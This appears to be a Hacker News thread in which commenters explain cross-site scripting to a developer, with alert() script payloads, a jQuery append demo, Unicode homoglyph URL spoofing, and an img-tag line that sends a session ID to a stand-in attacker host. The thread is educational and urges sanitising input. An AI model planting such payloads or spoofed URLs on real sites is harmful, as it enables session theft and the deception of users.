[scandox]

Indeed there is. Most often a token, stored in localStorage. But that token can be used from anywhere and with any mechanism. So I guess what I mean is that if there is a way for somebody to intercept or retrieve it, then I have in the past viewed that as a vulnerability of the browser (probably wrongly).

So what I'd love to understand better is the kind of attacks that would be practical, and how they would exploit a 3rd party library.

By the way I am totally receptive to the possibility that there may be grave vulnerabilities. I just don't have the kind of mind that easily thinks of them.

Edited: for clarity

[jamiesonbecker]

Your humility is pretty awesome.

As a simple example, paste <script>alert("haha")</script> into an form in your system that will (eventually) be viewable to someone else. Let's say it's something innocuous like the quantity field on an order form or a comment on a comment form.

Now, none of those characters will attack your database through SQL injection, right? So what happens when you (the administrator) views your latest orders? Basically, that javascript is now operating in the security context of you, the administrator, not in the context of the attacker that submitted it. It could do something worse than alert()... for example, it could grab your session token or a cookie's secret value (depending on the cookie) and send it off to <img src=evilattacker.xyz/clear.gif?sid=xxxx>, and now the attacker can become you.

Or, it could do the same thing to another user on your forum when they look at the evil comment.

This sort of attack is easy to do and broadly considered XSS (cross-site scripting). There are related areas of attack, like cookie forgery, referral, etc attacks. The OWASP string replacement guidelines (or my safify.js) can help with this, but ultimately string sanitation has to make sense for the context (i.e., browser bad characters are different from SQL injection bad characters).

And, you have to think about the weakest link... us poor humans, to whom similar 𝖻𝗎𝗍 𝗇𝗈𝗍 𝗊𝗎𝗂𝗍𝖾 𝗍𝗁𝖾 𝗌𝖺𝗆𝖾 𝗎𝗇𝗂𝖼𝗈𝖽𝖾 𝗅𝖾𝗍𝗍𝖾𝗋𝗌 𝖼𝖺𝗇 𝖻𝖾 𝗎𝗌𝖾𝖽 𝗍𝗈 𝗍𝗋𝗂𝖼𝗄 𝗌𝗈𝗆𝖾𝗈𝗇𝖾... 𝗆𝖺𝗒𝖻𝖾 𝗍𝗁𝖾𝗒 𝗍𝗁𝗂𝗇𝗄 𝗂𝗍'𝗌 𝖺 𝖽𝗂𝖿𝖿𝖾𝗋𝖾𝗇𝗍 𝖴𝖱𝖫 𝗍𝗁𝖺𝗇 𝗂𝗍 𝗂𝗌, 𝗈𝗋 𝖺 𝖽𝗂𝖿𝖿𝖾𝗋𝖾𝗇𝗍 𝗎𝗌𝖾𝗋𝗇𝖺𝗆𝖾.. (paste that into vim to see the actual characters in the preceding sentence.)

    𝗁𝗍𝗍𝗉𝗌://𝗀𝗈𝗈𝗀𝗅𝖾.𝖼𝗈𝗆/?𝗊=𝗇𝗈𝗍+𝗐𝗁𝖺𝗍+𝗒𝗈𝗎+𝗍𝗁𝗂𝗇𝗄

None of those unicode characters will usually trigger any blacklists, but because it "looks" right, sometimes can even trick security-aware hackers. (see also punycode). What if someone spoofs someone's username on github?

There's lots and lots of interesting ways to attack websites. It's tough to keep track of them all.

Another example. Your 404 page..

    <h1>404</h1>
    <p>Sorry, /x/y/z doesn't exist.</p>

Now, someone says "Hey, can you please visit this site?"

https://yoursite.com/this-is-a-long-url-thats-hidden-in-a-an...

[scandox]

Humility is all I've got :)

[olalonde]

https://en.wikipedia.org/wiki/Cross-site_scripting is a big one.

[ng12]

But I don't think jQuery vulnerabilities could possibly open you up to XSS attacks unless you were already doing something silly.

[jamiesonbecker]

something like..

    var comment = "<script>alert(1)</script>";
    $("div.comments").append(comment);

not so silly.

[ng12]

It is silly if the content of `comment` is coming from an external source (e.g. query string). Could you identify a specific jQuery vulnerability that makes otherwise safe code unsafe?

[AgentME]

I wouldn't say that jQuery has a vulnerability, but it having tons of APIs that have an overloard supporting injecting HTML from a string make it easy to write vulnerable code (compare to React where the only way to inject HTML from a string requires using a very explicit API involving typing "unsafe") and hard to identify vulnerable code (I can't easily ctrl-f through a codebase for easy-to-misuse functions because most of the calls will be calls to safer-element-taking overloads that I can only identify by following the code backwards).

[et-al]

This example will only affect that particular user viewing the page, though. And once they hit refresh, that'll be gone.

If I'm following your other example with malicious input into a form; the snippet would have to pass server-side validation (likely, since it's probably checking for SQL injects). Then past that, when it gets rendered for other users, the view/templating would need to display the snippet as a script instead of just text, right?

[jamiesonbecker]

(btw, I didn't downvote you; your question is quite legitimate. I upvoted you to restore balance to nature ;))

> This example will only affect that particular user viewing the page, though. And once they hit refresh, that'll be gone.

No, that wouldn't be an effective XSS. You highlighted an effective XSS in your follow-on statements.. basically, it needs to be saved on the server and then displayed to another user. At that point, you can attack them and steal whatever you like.

An effective XSS would be a form that doesn't validate input looking for XSS attacks specifically (on the server side, or on the client side before re-display, such as via my safify.js library). For example, if HN let me paste that in and didn't translate < to &lt; before display, my <script>alert(1);</script> would be actually executed as soon as it was displayed on screen (more correctly, attached to the DOM). This is a really important point ... it's the core of understanding what XSS really is.

> Then past that, when it gets rendered for other users, the view/templating would need to display the snippet as a script instead of just text, right?

No, unfortunately -- the view would just have to display it even as plain text. I'm guessing here that you're saying the entire page is displayed as an html template via jinja or something, rather than being pulled in with AJAX. AJAX is almost certainly going to be XSS'able unless you take steps. If you're using an HTML templater, it might sanitize/encode the HTML for you, but only if it knows that it's supposed to do that and that it's not part of your normal HTML. (In other words, most templaters would probably just stick the <script> tag right in the middle of all of the other HTML, and the browser will just try to parse and interpret anything that looks like HTML and ignore all the rest as noise.)

To continue with your thoughts..

1) attacker leaves comment in field

2) comment can be validated on server prior to sql injection, or not. that doesn't matter unless it's looking specifically for XSS vectors.

3) when comment is provided back to the client, it's displayed on screen using regular jquery calls. there's nothing wrong with using those jquery calls (any more than directly manipulating the DOM or using standard javascript); you just have to know what you're doing and sanitize the text. (i.e., this isn't referring to a specific vuln in jquery or javascript at all.)

4) most importantly, the view/templating does NOT need to "display" snippet as script. this is the key point. As soon as it's attached to the DOM, it becomes HTML.

You can try it out right here. Open up devtools (press f12) and paste this into the console tab:

    var comment = "<script>alert(1)</script>";
    $("body").append(comment);

[et-al]

Thanks for the upvote, but a bigger thanks for coming back to answer my question so thoroughly. :)

> If you're using an HTML templater, it might sanitize/encode the HTML for you, but only if it knows that it's supposed to do that and that it's not part of your normal HTML.

Yeah this was my larger concern. I'm never blindly appending user-submitted input into the DOM, but doing it through a templater like Handlebars.